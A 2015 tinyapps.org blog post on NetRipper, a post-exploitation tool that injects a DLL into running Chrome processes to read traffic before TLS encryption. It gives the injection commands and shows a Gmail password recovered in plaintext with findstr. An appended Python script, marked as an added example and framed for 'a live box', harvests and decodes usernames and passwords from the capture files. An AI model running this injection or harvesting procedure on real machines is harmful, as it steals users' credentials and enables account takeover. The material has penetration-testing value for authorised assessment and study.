tinyapps.org / blog


Sniffing encrypted traffic

Fiddler ("The free web debugging proxy for any browser, system or platform") has long been used for sniffing encrypted web traffic, but it works as a man-in-the-middle proxy: decryption only works once its untrusted root certificate has been installed (Tools > Fiddler Options... > HTTPS > etc), which typically requires full administrator access, and it needs the .NET Framework to run.

NetRipper ("Smart traffic sniffing for penetration testers") requires neither. It is "a post exploitation tool targeting Windows systems which uses API hooking in order to intercept network traffic and encryption related functions from a low privileged user, being able to capture both plain-text traffic and encrypted traffic before encryption/after decryption." Further, "NetRipper should be able to capture network traffic from: Putty, WinSCP, SQL Server Management Studio, Lync (Skype for Business), Microsoft Outlook, Google Chrome, Mozilla Firefox. The list is not limited to these applications but other tools may require special support."

Here's a simple example of it in action:
  1. Launch Google Chrome
  2. Open cmd.exe (no need for an elevated command prompt), cd to the NetRipper directory and run the following. NetRipper injects its DLL into every chrome.exe process running at that moment (three here), which is why Chrome is launched first:
    C:\Release>NetRipper.exe DLL.dll chrome.exe
    Trying to inject DLL.dll in chrome.exe
    Reflective injected in: 2880
    Reflective injected in: 2992
    Reflective injected in: 3096
  3. Log in to a Gmail account in Chrome
  4. NetRipper saves data to %temp%\NetRipper by default (on most systems, this will be C:\Users\username\AppData\Local\Temp\NetRipper):
    C:\Release>dir %temp%\NetRipper /B
    2880_chrome.exe_recv.txt
    2880_chrome.exe_SSL_Read.txt
    2880_chrome.exe_SSL_Write.txt
    2880_chrome.exe_StringFinder.txt
    2880_chrome.exe_WSASend.txt
    NetRipperLog.txt
  5. Search for the string "Passwd". The SSL_Write file holds whatever Chrome handed to its TLS library before encryption, so the POSTed login form shows up in plain text:
    C:\Release>findstr Passwd %temp%\NetRipper\2880_chrome.exe_SSL_Write.txt
    ...Email=tinyapps%40gmail.com&Passwd=PASSWORD_IN_PLAIN_TEXT_SHOWN_HERE&PersistentCookie=yes&signIn=...
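The findstr in step 5 works when you already know the field name. A small triage script that walks the capture directory, picks out the pre-encryption files, and URL-decodes any credential-looking form fields is more useful on a real engagement. The following is an added example, not part of the original post or of NetRipper itself; it assumes NetRipper's default file layout (<pid>_<process>_<function>.txt) and the field names it flags are assumptions (Google's 2015 login form used Email and Passwd; the others are common choices). The capture it scans is constructed inline, so it runs offline.

```python
"""Triage NetRipper capture files for submitted credentials.

Added example (not from the original post and not NetRipper's own code).
Assumes NetRipper's default layout: one text file per hooked function named
<pid>_<process>_<function>.txt, holding the plaintext the process handed to
that function. Only the outbound, pre-encryption hooks (SSL_Write, WSASend)
are scanned; SSL_Read/recv hold server responses.
"""
import os
import re
import tempfile
from urllib.parse import unquote_plus

# Field names worth flagging. These are assumptions, not a NetRipper list.
CREDENTIAL_KEYS = {"passwd", "password", "pass", "pwd", "pin", "token"}
IDENTITY_KEYS = {"email", "username", "user", "login"}

# Sample SSL_Write capture, constructed for this example. Because NetRipper
# logs plaintext before encryption, a login POST appears verbatim.
SAMPLE_CAPTURE = (
    "POST /ServiceLoginAuth HTTP/1.1\r\n"
    "Host: accounts.google.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "GALX=abc123&Email=tinyapps%40gmail.com&Passwd=hunter2%21"
    "&PersistentCookie=yes&signIn=Sign+in\r\n"
    "GET /mail/ HTTP/1.1\r\nHost: mail.google.com\r\n\r\n"
)

FILENAME_RE = re.compile(
    r"^(?P<pid>\d+)_(?P<proc>.+?)_(?P<func>SSL_Write|WSASend)\.txt$"
)
# key=value pairs as found in form bodies (and, incidentally, Cookie headers)
PAIR_RE = re.compile(r"([A-Za-z0-9_\-\.\[\]]+)=([^&\s]*)")


def parse_pairs(line):
    """Split one application/x-www-form-urlencoded line into decoded pairs."""
    return [(k, unquote_plus(v)) for k, v in PAIR_RE.findall(line)]


def find_credentials(text):
    """Return (identity, secret_key, secret) triples found in captured plaintext."""
    hits = []
    for line in text.splitlines():
        pairs = parse_pairs(line)
        secrets = [(k, v) for k, v in pairs if k.lower() in CREDENTIAL_KEYS]
        if not secrets:
            continue
        # Pair the secret with the first identity-like field on the same line.
        identity = next((v for k, v in pairs if k.lower() in IDENTITY_KEYS), None)
        for key, value in secrets:
            hits.append((identity, key, value))
    return hits


def scan_directory(capture_dir):
    """Walk a NetRipper output directory and attribute hits to pid/process/hook."""
    results = []
    for name in sorted(os.listdir(capture_dir)):
        m = FILENAME_RE.match(name)
        if not m:  # NetRipperLog.txt, recv/SSL_Read/StringFinder files, etc.
            continue
        path = os.path.join(capture_dir, name)
        with open(path, encoding="utf-8", errors="replace") as fh:
            for identity, key, secret in find_credentials(fh.read()):
                results.append({
                    "pid": int(m["pid"]), "process": m["proc"], "hook": m["func"],
                    "identity": identity, "key": key, "secret": secret,
                })
    return results


def demo():
    """Build a fake %temp%\\NetRipper directory from the constructed sample and scan it."""
    d = tempfile.mkdtemp(prefix="NetRipper_demo_")
    with open(os.path.join(d, "2880_chrome.exe_SSL_Write.txt"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_CAPTURE)
    with open(os.path.join(d, "2880_chrome.exe_SSL_Read.txt"), "w") as fh:
        fh.write("HTTP/1.1 302 Found\r\n\r\n")  # inbound: must be ignored
    with open(os.path.join(d, "NetRipperLog.txt"), "w") as fh:
        fh.write("Reflective injected in: 2880\r\n")
    return scan_directory(d)


if __name__ == "__main__":
    for hit in demo():
        print("{pid} {process} [{hook}] {identity} {key}={secret}".format(**hit))
```

On a live box, point scan_directory() at %temp%\NetRipper instead of the demo directory. Percent-decoding matters: the raw capture shows the address as tinyapps%40gmail.com, and a password containing "+" or "%" is unreadable until decoded.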

/windows | Aug 15, 2015

